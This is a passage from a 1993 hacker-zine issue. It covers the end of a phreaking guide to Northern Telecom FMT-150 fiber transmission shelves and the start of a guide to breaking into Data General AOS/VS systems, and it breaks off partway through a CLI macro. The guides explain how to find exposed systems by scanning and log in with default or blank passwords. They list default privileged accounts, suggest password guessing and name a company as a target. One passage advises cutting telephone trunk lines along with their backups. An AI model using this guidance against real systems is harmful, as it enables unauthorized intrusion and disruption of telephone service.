Ray Tube) Interface is an important system feature of the Maintenance Control Unit (MCU). You can plug in to a RS-232 port directly (use a null-modem cable) on the "shelf" or remotely via a modem (!). Also a Tandy 200 can be interfaced with the Maintenance Control Unit. The network configuration, the status of each node, and any alarm existing can be viewed on the terminal. The interface goes from 300 to 9600 baud. The software already present on the MCU is all that is needed, the interface need only support certain emulations (see Operation Procedures.) (hmmm... Could Radio Shack and Northern Telecom be butt buddies?) Also available is a RS-422 interface which provides a large number of alarm status and control points through the MCU. The port is labeled "Customer E2A" on the shelf. CAMMS is an extended feature of the FMT-150. It stands for Central Access Maintenance and Monitoring System which can also take advantage of the Maintenance features (see Operation Procedures). All this is, is a mini-terminal, that can be installed and act like a CRT interface. Specifications When interfacing the CRT with a null modem cable, your cable should fit the diagram below. ÚÄÄÄÄ¿ ÚÄÄÄÄ¿ ³1 OÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅO 1 ³ ³2 OÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅO 3 ³ ³3 OÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅO 2 ³ ³4 OÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅO 8 ³ ³5 OÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅO 20³ ³6 OÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅO 7 ³ ³7 OÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÅO 4 ³ ³8 OÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÅO 5 ³ ³20 OÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅO 6 ³ ÀÄÄÄÄÙ ÀÄÄÄÄÙ Pin Definitions 1. Ground 6. Data Set Ready 2. Transmit Data 7. Ground 3. Receive Data 8. Data Carrier Detect 4. Request to Send 9. Data Terminal Ready 5. Clear to Send When interfacing your Hayes compatible (telephone connection) configure the DIP switches in this manner. X=empty space O X O X X O X O O=the switch's position X O X O O X O X 1 2 3 4 5 6 7 8 Alarms and Buttons Listed below are some LED descriptions and button meanings that a phreak will find on the shelf. LEDs Description ----------------------------------------------------------------- MAJOR RED - Service affecting failure (run, they'll be there soon!) MINOR YELLOW - Non-service affecting failure. FUSE ALARM RED - A fuse blew REM YELLOW - An alarm has occurred at a remote site. Order-wire Left GREEN - Solid, Left order wire is active, if flashing, incoming call on left. Order-wire Right Same as above, but for Right ----------------------------------------------------------------- BUTTONS Description _________________________________________________________________ LP TEST Lights up all LEDs ACO Turns off existing audible alarm LOC 1, 2, 3 (OW) Rings every site common to STX signal 1, 2, and 3 EXP 1, 2, 3 (OW) Same as above ----------------------------------------------------------------- Power Supply Unit This is a seemingly 5V output power supply, which has a simple ON/OFF switch which is housed under a protective latch, pull this and have an instant phreak marathon (see REDUNDANCY at end of file.) ðEquipment Configurationð The FMT-150 system is suitable for a wide variety of applications, as follows: * Access Networks CO to Customer Serving Areas CO to Digital Loop Carrier CO to Switch Remote CO to Customer Premises. * Inter-Office Trunk routes * Broadband Applications such as Video * Entrance Links to Radio Systems * Dynamic Network Routing * Stand-Alone Multiplexer Applications with Radio * Route Diversity * Wide Area Network (WAN) Application ðOrder-Wireð Order Wire A buzzer is heard and a flashing LED is seen if a call is coming in, plug in a handset/headset connector into the jack on the shelf. To terminate the call pull the plug out or hit #. To dial, just plug in and dial four digits, wildcards are also allowed by use of the * key. The handset described is a Contempra Handset (NT2E36AA). A test set could also be used but the plug would have to be altered, its 4 wire, remember. Order Wire is only CO-to-CO communication. The jack can be plugged into the front of the FMT-150 shelf. The dialing format is described below. ----------------------------------------------------------------- First digit: Indicates the type of call being made Second, Third, and Indicated which site will be dialed. Fourth digits Address of the site is set via rotary switches located on the front edge of the SCU module. ----------------------------------------------------------------- First digit significance 1 = local call for STX ({Pseudo} Synchronous Transport Signal: First Level at 49.92 Mb/s [NT]) signal 2 2 = local call for STX signal 2 3 = local call for STX signal 3 (where'd 4 go?) 5 = express call for STX signal 1 6 = express call for STX signal 2 7 = express call for STX signal 3 The three following digits are not standard, so if you want to experiment with this hit a first digit and then three *'s On the shelf there are buttons which act like speed dialing, the first three letters stand for LOCal or EXPress and the number is the signal, so EXP 2 would be broadcast call on STX signal 2, express channel. ðInstallationð A typical FMT-150 Setup ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Ground Bar ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ Fuse & Alarm Panel ³ A ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ | ³ FMT-150 Shelf ³ | ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ 7ft ³ FMT-150 Shelf ³ | ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ | ³Fiber Splice/Storage Panel or CAMMS ³ V ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ <----25.94in----> ³ FMT-150 Shelf ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ FMT-150 Shelf ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ FMT-150 Shelf ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ FMT-150 Shelf ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ FMT-150 or Rectifier Shelf ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ FMT-150 or Standby Batt. Shelf ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ AC outlet Assy ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ðOperation Proceduresð Specifics on Interfacing The RS-232 serial interface supports the following terminals. * DEC VT 100 * DEC VT 102 * DEC VT 220 * DEC VT 320 * FALCO * IBM 3162 with VT 220 cartridge * Wyse WY85 with VT100 Emulation * Ramodom VT200 portable terminal * Televideo 922 * Televideo 9220 * Tandy 200 (only with Multipoint Plus MCU:NT7H90CA/XC) * CAMMS (only with Multipoint Plus: NT7H90CA/XC/FA) * Cybernex (in 8-bit mode only) (Ok bros this is the part we are interested in so sit back) Login Procedures If you approach the FMT-150 shelf and have a previously described interface, then you can login. Also if you are scanning (GTE (Northern Telecom) areas only) and come across a "sitting system" that displays a message (below) after hitting 3 returns, you are in! 1 - DEC VT100 2 - NT Meridian 6000 (Crosstalks or Procom with VT100 emulation) 3 - Tandy 200 (running Telecom) F4- NTCAMMS MDU Enter Terminal Type: Choose your terminal type, usually 2 (use VT100) if you are calling in, and it will prompt you with a "Login: " prompt, this is a trick, there are no user levels, the "Login:" simply means enter the password, and the default is to hit return, so always try that first. If a password is installed then try something like FMT-150 or something that you would think they would use. You should get a screen like this one after choosing the terminal type: FMT-150 Transmission System Northern Telecom Firmware Copyright Northern Telecom 1988 - - Node Id.: 123456789012345- - - - Last Update 87/03/06 11:07- Login: (remember, enter a password here, no user levels!) - - Syst Id.: 123456789012345- - - - Time: 87/03/06 11:07- - - After Logging In (commands are presented in an outline configuration, you should be getting screens of output, but this outline will show you what to input. # = number, not pound, = spacebar.) Example: If I wanted to set the system's date to 1/4/1943 (heh) then after logging in I would press, "c" then "d", then "43", then "1" and finally "4". ----------------------------------------------------------------- a Alarms (once again, lame stuff) o Optical Tx/Rx unit-level alarm screen. t Translator module-level alarm screen. m DM-13 multiplexer-level alarm screen. c Common equipment-level and customer input/output points alarm screen. c Configuration (!) a alarm logger e enable alarm logger d disable alarm logger i # "name" Name a customer input point o # "name" Name a customer output point d #1 #2 #3 Set date: #1 is year, #2 is month #3 is day. t #1 #2 #3 Set time: #1 is hour, #2 is minute. p "oldpass" "newpass" Change password from "oldpass" to "newpass". s "system ID name" Name System ID s Switching commands (extremely extensive, so I will include a small portion) # m # Display DM-13 Switch Screen t Display translator/optics switch status for node #. Display translator/optics switch status for local node or node last displayed. m Maintenance Commands r (see note) * Reset all nodes # Reset node # t # o Operate test of customer input/output points and E2A ports. r Release test of customer input/output points and E2A ports. l Logout of the FMT-150 system. n Network Status Display network status screen. NOTE: After executing a local or global MCU reset, the message "PROCESSOR CRASH" will appear on the bottom of the CRT's screen. As a result, the user will have to log back into the system. In addition, a global MCU reset will clear all "names" and "settings" previously defined (that is, system ID, node, customer inputs/outputs, time and date). ----------------------------------------------------------------- Many other commands are listed but they are extremely numerous and useless to the average phreak. If a "terminal" that is 4.4 inches tall with a center screen and 2 12 key keypads on either side is seen on the shelf, this will be a CAMMS terminal, all functions above can be performed with this unit, its menu driven. ðTroubleshootingð This section is the manual is devoted to fixing problems in the FMT-150, aimed at the average see-my-crack-of-the-ass telco maintenance man. Basically, if you see any red LEDs, inspect them and judge if you should get the hell out of the CO or not, usually red LEDs mean trouble. REDUNDANCY When doing anything of this nature to a fone company, you must remember, they are not stupid, everything has something to fall back on, if you were to cut a trunk line, there would be another to take its place. Usually there will be only one backup, so be meticulous and find both. ðOutroð Hope this file was worth something to somebody, it applies mostly to those in a GTE area, since GTE uses Northern Telecom equipment and most everyone else uses AT&T stuff. -FyberLyte 9-93 ==Phrack Magazine== Volume Four, Issue Forty-Four, File 14 of 27 ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()() A Guide to Data General Corporation's AOS/VS System PART I by Herd Beast INTRODUCTION ~~~~~~~~~~~ This file is a full (as full as such a file can get) guide to the AOS/VS system. The main reason for writing it is that from what I've seen, there is practically no info (in the form of files or otherwise) about it. I won't say I'm the only one who knows anything about it, but I had a hell of a time getting any sort of help when I started hacking these systems (I didn't get that help, in case you were wondering, and wrote this file all by myself 'cause I'm a MAN! Hahaha! ). I will explain a little about AOS/VS and then explain some of the commands and security features in it. This file is not a buffer of any help facility, although much information can and will be found in the help facility. I can be contacted (hopefully) at hbeast@mindvox.phantom.com. If you want a nice start, and a front page on Newsweek, some Texaco ("Star of the American Road") systems run AOS/VS. I cannot, will not, and do not assume liability for ANY of the effects of the use of this file. Also, I cannot guarantee that EVERYTHING will work EVERYWHERE, so treat this file as a reference. This file by no means covers everything about AOS/VS. IDENTIFYING THE SYSTEM ~~~~~~~~~~~~~~~~~~~~~ Should you just fall at the system prompt, you might mistake it for a VMS. However, blank prompts like that are rare. An AOS/VS will identify itself like this: (this and all other buffered info in this file are from an AOS/VS II with CLI32. Only the best for Phrack) AOS/VS II 2.20.00.12 / EXEC-32 2.20.00.07 31-May-93 22:51:25 @CON177 Username: Password: Another thing different will be the incorrect login message: Invalid username - password pair The header line lists the system version, current time/date and the console you are using. When you reach the maximum incorrect logins defined in the system, it will show the line below and disconnect: Too many attempts, console locking for 10 seconds When you do succeed to log on, the system will display: ------ Copyright (C) Data General Corporation, 1980 - 1992 All rights reserved. Licensed material -- property of Data General Corporation This software is made available solely pursuant to the terms of a DGC license agreement which governs its use. ((NOTE: Or something else. This is the default)) -------- Most recent logon 1-Jan-93 10:10:01 Very clear. Before you do anything, type CHARACTERISTICS. You will then get output like this: /605X/LPP=24/CPL=80/BREAK=BMOB/TCC=40000/TCD=5000/TDW=1000/THC=2000/TLT=2000 /ON/ST/EB0/ULC/WRP/CTD /OFF/SFF/EPI/8BT/SPO/RAF/RAT/RAC/NAS/OTT/EOL/UCO/MRI/FF/EB1/PM/NRM/MOD/TO/TSP/ C/FKT/VAL/HOFC/SHR/OFC/IFC/16B/ACC/SRDS/XLT/AUTOBAUD/CALLOUT/MDUA/HDPX/SMCD/RT D/HIFC/G1G0/DKHW/NLX Look for "/NAS". It stands for non ANSI standard, which means that if you are using ANSI (probably you are), you needs to issue CHARACTERISTICS/OFF/NAS, should you find "/NAS" listed after "/ON". Upon logging off from the system (BYE), you will see: AOS/VS II CLI Terminating 1-JAN-93 11:11:01 Process 180 Terminated Elapsed Time 0:16:26, CPU Time 0:00:02.447, I/O Blocks 281 (Other console jobs, same USERNAME -- 16) User 'HBT' logged off @CON228 1-Jan-93 11:11:01 SYSTEM DEFAULTS ~~~~~~~~~~~~~~ These are accounts I usually found existing. As usual, they are really similar to those of any other system. USERNAME -------- ((Privileged accounts)) OP EXEC default username SYSMGR System manager CEO_MGR If the system is running CEO OPER OPERATOR ((Regular accounts)) CEO.xxxxx If the system is running CEO, a CEO user, xxxxx being his number. As for password guessing, well, it's all been said. Try the username, with some modification, you might get in. As dumb as it sounds, yes, people do have weak passwords, even today, although not everywhere. SYSTEM STRUCTURE ~~~~~~~~~~~~~~~ In this section I'll try to describe the real basics of AOS/VS. I will describe a few commands HERE, and not under "Command List", these commands will be the basic commands: change directory, list files, etc, needed to survive in any system. The AOS "shell" is called CLI (Command Line Interpreter). There are two versions of CLI, CLI16 and CLI32, with CLI32 being more advanced. The CLI version affects the system prompt, the way commands are handled by the system and by the user, and more. For example, some command switches do not exist under CLI16 (unless very important, I omitted switches that work only under CLI32 from this file). Here are the privilege levels available under AOS/VS: CLI16 PROMPT CLI32 PROMPT PRIVILEGES MODES -------------+--------------+-------------------------- ) ) None Sm) System Manager +) Sp) Superprocess *) Su) Superuser SmSp) System Manager and Superprocess SmSu) System Manager and Superuser #) SpSu) Superprocess and Superuser SmSpSu) System Manager, Superprocess, Superuser AOS/VS doesn't grant privileges upon logon. A user's profile may state the user can access privilege level So-And-So, and if the user later needs that level, he calls upon a SUPER utility to grant him that level. This is the place to explain how several different utilities work. OPERATOR grants the user the ability to access diskettes in dump or load sessions (see the section titled "System Commands") in sequential order, instead of accessing them one by one. SUPERUSER turns off all access checking, enabling the user to do anything with any file on the system. SUPERPROCESS gives the user the ability to terminate, block, unblock, or change priorities of any process on the system. The last command, PRIVILEGE, which is available only under CLI32, enables the user to set both SUPERUSER and SUPERPROCESS access. It also offers the only way to set SYSTEMMANAGER access, which is required for operations like changing time or date. Command are executed by calling their names, or any part of their name that only fits them. For example, SUPERUSER can be abbreviated as SUPERU. It is important to remember that command switches MUST follow the command without any space, or else the command will try to process the switches! For example, CHARACTERISTICS /OFF/NAS will result in an "Error: Illegal filename character characteristics,/off/nas". The root directory directory is called ':'. Any other directories are under it, for example ':OUT' and ':OUT:RALF'. If, for example, you FTP into an AOS/VS and use "cd /" you will be moved in ':'. If you use "cd /out/ralf" you will be moved into ':OUT:RALF'. To make this much more clearer (right): : HBT | | TEXT / \ PHRACK SEX Legal characters in file or directory names are all the alphabet and numbers, plus '$', '_', '.' and '?'. Moving from directory to directory is done by using the "DIRECTORY" command. Without any arguments, DIRECTORY shows the current path. With an argument, DIRECTORY changes to that directory. DIRECTORY [directory] --------------------- /I Changes to the initial directory /I path Changes the initial directory to "path" /P Changes to the previous directory To list files in a directory, use "FILESTATUS". Without arguments, FILESTATUS lists files in the current directory. With a path argument, FILESTATUS lists file in that path. FILESTATUS [directory] ---------------------- /[AFTER|BEFORE]/[TCR|TLA|TLM]=date and/or time Shows files matching the selection date or time. The selections are: time created (TCR); time last accessed (TLA); and time last modified (TLM). The difference between accessed and modified is pretty clear, for example if the file is an executable. The date/time format is: for TIME - hour-minute-sec (xx-xx-xx); for DATE - day-month-year (xx-xxx-xx); for BOTH - dd-mmm-yy:hh:mm:ss. Example command lines will be FILESTATUS/AFTER/TCR=11 Created after 11 AM FILESTATUS/BEFORE/TLM=01-JAN-90 Modified before 01/01 1990 FILESTATUS/AFTER/TLA=01-JAN-90:11 Accessed after 11 AM, 01/01, 1990 /ASSORTMENT Normally, FILESTATUS output is just file name. With /ASSORTMENT, FILESTATUS shows file type, time/date of creation, and length in bytes. Similar to Unix, if the file is a link, the file type is set to LNK and FILESTATUS shows its path. /COUNT Tells how many files are in the directory. [CLI32] /[DCR|DLA|DLM] Shows date of creation (DCR); date last accessed (DLA); and date last modified (DLM). /LENGTH Displays file length in bytes. /LINKNAME If the file is a link, FILESTATUS displays the information about the file that it's linked too. For example, if BOB is linked to RON, FILESTATUS/LINKNAME BOB would display RON's details. Otherwise, nothing happens. /TYPE=[\]type Displays files of type, or all files not of that type (if \type) was used. See below for valid file types. /UDA If the file has a UDA (user data area), its presence is displayed. The CLI's wildcards (sort of), are '=', '^', ':' and '@. '=' means the current directory. '^' means the parent directory. ':' is (as already said) the root directory. '@' means the devices directory (where consoles, tape drives, modems, etc are. Similar to /dev on Unix). Note that when talking about directories, the ':' is already included. For example, if you're in :UDD:HBT:TEXT, and want to move to :UDD:HBT:BIN, you'd type DIRECTORY ^BIN, and not DIRECTORY ^:BIN. File wildcards are '+', which is equivalent to '*' at DOS, and '#' which is equivalent to '*.*' at DOS. For example, FILE +.CLI will show all the files whose names end with ".CLI"; FILE :UDD:# will display all the files in UDD (which won't happen if you just issue FILE :UDD -- in that case, you'll see only information about the directory UDD, and not the files within it). As with Unix, you can enter more than one command on a line if you separate the commands with a ';' (a semicolon). If you need more than a line for your commands, type an '&' before pressing Return, and the CLI will just keep on reading, instead of processing the command line and try to run it. This goes ONLY for a sequence like this: "&", an '&' anywhere else acts just like any other character. There are several control characters the CLI takes and uses: CONTROL CHAR WHAT IT DOES ------------------+------------------------------- Ctrl-C Begins a Ctrl char sequence. Ctrl-D End of file. Ctrl-L Clear screen. Ctrl-P Don't interpret the following character in any special way. Ctrl-S Stops output to the terminal. Ctrl-Q Resumes output to the terminal. Ctrl-U Cancel (delete) current input line. Ctrl-C Ctrl-A Interrupt current process. Ctrl-C Ctrl-B Terminates current process. Ctrl-C Ctrl-C Empties the input buffer. Ctrl-C Ctrl-E Terminates current process and create a break file (where termination message is stored). If the CLI is run with a /NOCA switch, it will ignore Ctrl-C Ctrl-A sequences, so if put in the start of a macro file, it won't allow you to break that macro and enter the CLI. AOS/VS had many file types. File types are three letter acronyms (although not always) for the file; the same way DOS and VMS have extensions, the file type controls what the file is (it can have any extension in its name). File types have a decimal numbers assigned to them, as well. There are 70 file types, although the operating system reserves space for 128. The user can define his own file types. These are some of the he AOS/VS file types: TYPE NUMBER TYPECODE MEANING -------------+------------+----------------- All these types / 11 LDU Logical disk unit are directories -| 12 CPD Control point directory \ 10 DIR Directory 0 LNK Link 68 TXT Text 1 SDF System data file 2 MTF Magnetic tape file 13 MTV Magnetic tape volume 22 MTU Magnetic tape unit 49 CON Console 51 RMA Remote host (RMA) 52 HST Remote host (X.25 SVC) 54 PVC Remote host (X.25 PVC) 64 UDF User data file 69 LOG System log file 74 PRV AOS/VS program file 75 WRD Word processing file 87 UNX Unix file (created on a Unix) 95 SPD Spreadsheet file 104 PIP Pipe 105 TTX Teletex file "Generic files" are actually pointers that help using devices and files. For example, the @NULL generic file functions like /dev/null on Unix. Here are the generic files: @CONSOLE The process' (user's) console. @DATA A long file created by the user that will be used as data by a program. @DATA is set using DATAFILE. @INPUT A short file created by the user that will be used as input by a program. @INPUT is set using PROCESS/INPUT=. @NULL Well, null. @LIST A long output file that will be used as a program's output. @LIST is set using LISTFILE. @OUTPUT A short output file for a program. @OUTPUT is set using PROCESS/OUTPUT=. When a program is run, it will sometime try to open one of these generic files. If they're not set, it will fail on error 21 (non existent file). But if the file is set, it can use it. So, for example, you can use PROCESS/OUTPUT=@CONSOLE PROGRAM for output to go to you, or PROCESS/OUTPUT=OUT_FILE PROGRAM for it to go to OUT_FILE. "Device files" are files the connect to hardware parts, such as modems, printers, tapes, diskette drives, FAX machines, etc. In due time, a program called EXEC makes a connection between processes and devices and utilizes those devices (see the section titled "The 'EXEC' Program"). Some devices are also used by the backup related programs DUMP and LOAD, and more. Some of these are: @MTB0:x The magnetic tape unit #0, x being a dumpfile on the tape (x starts from 0). @DPJ A diskette device name. @LFD A generic labeled diskette file name. The equivalent of a PATH (usually environment variable) in other systems is called SEARCHLIST in AOS/VS. When you call a command, or ask for help, the CLI looks through your SEARCHLIST for the files. So, assuming you typed HELP MODEM, and somewhere in your searchlist there exists a file called MODEM.CLI, HELP will show you, modem - Macro, File :UTIL:COMM:MODEM.CLI The same goes for other commands, even TYPE (TYPE MODEM.CLI from :UDD:HBT, if :UTIL:COMM is in your searchlist and there's no MODEM.CLI in :UDD:HBT will work). To display your searchlist, just use plain SEARCHLIST. To change it, use SEARCHLIST path,path,path ... It's possible to set a password for your current CLI session. This password is not the password used upon login! It's a password the user sets to protect his session. He then types LOCK, and from then, anyone wishing to use the user's CLI (from the user's console), must enter the password first. Legal passwords are up to 32 characters long, not including Ctrl characters. The CLI offers several levels to the user. It starts on the highest level, 0, and the user may create other level, and use POP to move up a level, and PUSH to go down a level. When a user POPs to a level, the CLI environment of the older (higher) level remains (the environment of the level he was in until that time is therefore changed). When he PUSHes, the current level's environment is copied to the lower level. To display the current CLI level, use LEVEL. To display the level's environment, use CURRENT. To display an upper level's environment (except when at the highest level), use PREVIOUS. When you want to print a file, or run something in the background, you have to submit it as a job. The submit a printing job, use the QPRINT command (will print the file). To submit a batch job, which is for executing a command, use QBATCH (for example, QBATCH MASM ASMPROG). AOS/VS had a facility called "queues", managed by the EXEC program (see "The 'EXEC' Program"). A queue is a place where file transfer, batch, and printing jobs are stored until the right process can take them and execute them. The standard queues are: QUEUE NAME JOB TYPE CONTENTS --------------+------------+---------------------------------- BATCH_INPUT Batch Batch input files. Submitted by QBATCH or QSUBMIT. BATCH_OUTPUT Printing Output files from finished batch jobs (usually sent to a line printer). BATCH_LIST Printing List files from finished batch jobs (usually sent to a line printer). ((Batch jobs are submitted through QBATCH.)) LPT Printing Print jobs submitted by QSUBMIT. MOUNTQ Mount Tape mount requests. Submitted by MOUNT. After a job has been submitted, use QDISPLAY to show its status. Use QHOLD to hold jobs and QUNHOLD to release them. Last, to display the status of all queues, use QDISPLAY as well. AOS/VS also has an extensive help facility. For help on broad topics, use HELP (to list topics) and then HELP *TOPIC. For help on system commands, use HELP COMMAND (for a list of switches) or HELP/V COMMAND for more details. CLI MACRO PROGRAMMING ~~~~~~~~~~~~~~~~~~~~ Macro filenames usually end with ".CLI" are usually text files (filetype TXT). A macro is a file that will be executed when called (adding .CLI to the name when calling isn't necessary), and perform the commands (or other macros) in it. If the macro matches the name of a CLI command, the macro must be called together with the .CLI part of its name. Macros expand arguments in the following way: Range Arguments (like filenames): %x% Argument number x, with its switches. %0% is the macro's name. %-% All the arguments, with their switches, except for %0%. %x-y,i% Arguments x through y, in jumps of i. If x or i are missing, the CLI assumes 1. If y is omitted, 32767 is assumed. For example, if the arguments were "1 2 3 4 5 6 7", a %2-6,2% call expands to "2 4 6". Switch Arguments: %x/% All the switches of argument x. %x\% Argument x, without its switches. %x/y% Argument x, with switch number y. %x/y=% The value of argument's x switch number y. %x\y% All the switches of argument x, including their values, except for switch number y. Conditionals are used in the form of [CONDITIONAL,ARGS]. If a conditional returns TRUE, the CLI executes everything after it until it reaches an ELSE or an END. Otherwise, it skips to an ELSE or an END (basic programming). !EQUAL True if both arguments equal alphabetically. !NEQUAL True if both arguments don't equal alphabetically. !UEQ True if both arguments equal numerically. These are called pseudo macros, and are usually built like conditionals, although sometimes they just substitute for a part of the environment. There are about 60 of them, but I'll only list a selected few for brevity. [!ACL path] Expands for the ACL of path. [!ASCII octnum] Expands to the ASCII character with the octnum octal number. For example, newline is octal 12. [!CLI] Expands to CLI32 or CLI16, according to the CLI. [!DATE] Date, like 01-Jan-93. [!SYSTEM] Expands to the type of OS. [!SEARCHLIST] Expands to the search list. [!LEVEL] Expands to the current CLI level. [!CLI] Expands to the CLI type. [!EXPLODE args] Puts a comma between each pair of character in args. When used with STRING, in converts spaces and tabs too. When used with WRITE, in converts into space. [!LISTFILE] Expands to the path of the listfile. [!USERNAME] Expands to the username of the person running the macro. [!LOGON] Returns CONSOLE if logged on to a terminal or BATCH if logged in on a batch stream (only works for EXEC logons). [!DATAFILE] Expands to the path of the datafile. [!HID [host]] Returns the host ID. With [host] return the host ID of [host]. [!HOST [host]] Returns the host name. [!STRING] Expands to the value of the CLI string. A more complex pseudo macro is !READ: [!READ[/args] text] !READ prints text to the output and then expands to what was received from the input (which is considered finished when a newline is received). !READ's args are functional only under CLI32 and are: /EOF=str The string that will be returned if EOF is met. /FILEID=file Reads from file instead of @OUTPUT. The file must be already opened using OPEN. /LENGTH=x Read until x characters were typed. /S Discards all typed after a semicolon (';') or a left bracket ('['). Otherwise, that text must be a valid CLI command or macro, or a pseudo macro or macro ending with a right bracket if following the left bracket. Note that all pseudo macros, including !READ can be used at the command line and not just in CLI macro files. Here's an example: COMMENT ------------------------------------------------- COMMENT Examples of the use of conditionals and arguments COMMENT in macros. COMMENT This macro was invoked like this: COMMENT HMAC 9 0 000 COMMENT ------------------------------------------------- [!EQUAL,%1%,] WRITE,,,,Execute with arguments please! [!ELSE] [!EQUAL,%2%,%3%] WRITE,,,,%2% and %3% do match ALPHABETICALLY. [!ELSE] WRITE,,,,%2% and %3% don't match ALPHABETICALLY. [!END] [!UEQ,%2%,%3] WRITE,,,,%2% and %3% do match NUMERICALLY. [!ELSE] WRITE,,,,%2% and %3% don't match ALPHABETICALLY. [!END] [!UEQ,%1%,%2%] WRITE,,,,%1% and %2% do match NUMERICALLY. [!ELSE] WRITE,,,,%1% and %2% don't match NUMERICALLY. [!END] [!END] COMMENT ------------------------------------------------- COMMENT The output would be: COMMENT 0 and 000 don't match ALPHABETICALLY. COMMENT 0 and 000 do match NUMERICALLY. COMMENT 9 and 0 don't math NUMERICALLY. COMMENT ------------------------------------------------- [!EQUAL,[!READ What's your name?,,],HBT] WRITE,,,,[!ASCII 12]You're HBT. [!ELSE] WRITE,,,,[!ASCII 12]You're not HBT. [!END] [!EQUAL,[!CLI],CLI16] WRITE,,,,[!ASCII 12]I was going to show you something else. WRITE,,,,Too bad you're using CLI16 which won't let READ take arguments. [!ELSE] STRING [!READ/LENGTH=1 Continue? (Y/N)] [!EQUAL,[!STRING],N] WRITE,,,,[!ASCII 12]Good man [!USERNAME]. [!ELSE] [!EQUAL,[!STRING],Y] WRITE,,,,[!ASCII 12]Too bad Mister I-Use-[!SYSTEM] [!ELSE] WRITE,,,,[!ASCII 12]Learn English guy. [!END] [!END] [!END] WRITE,,,,Thank you for using %0%. AOS/VS can also be programmed in 16 bit and 32 bit Assembly (and compiled using MASM), BASIC, Fortran, C, Pascal and probably others. This second program is actually quite simple. I do not even read the UPF type file directly; I just feed text into the PREDITOR (see the next section). COMMENT ------------------------------------------------- COMMENT Delete the little help screen if you are under COMMENT CLI16. Or just run CLI32. COMMENT ------------------------------------------------- [!EQUAL,%1%,] WRITE,,,,[!ASCII 12]Format is: %0%/A NAME WRITE,,,,,,,,,,,,or /L NAME [!ELSE] [!EQUAL,%1%,] WRITE,,,,,,,Which user exactly? [!ELSE] [!NEQUAL,%0/L%,] WRITE/L=?USER.TMP L WRITE/L=?USER.TMP %1% WRITE/L=?USER.TMP WRITE/L=?USER.TMP b PROC/DEF/IOC/IN=?USER.TMP/BLOCK PREDITOR DEL ?USER.TMP [!ELSE] WRITE/L=?USER.TMP c WRITE/L=?USER.TMP %1% WRITE/L=?USER.TMP y WRITE/L=?USER.TMP %1% WRITE/L=?USER.TMP n WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP WRITE/L=?USER.TMP 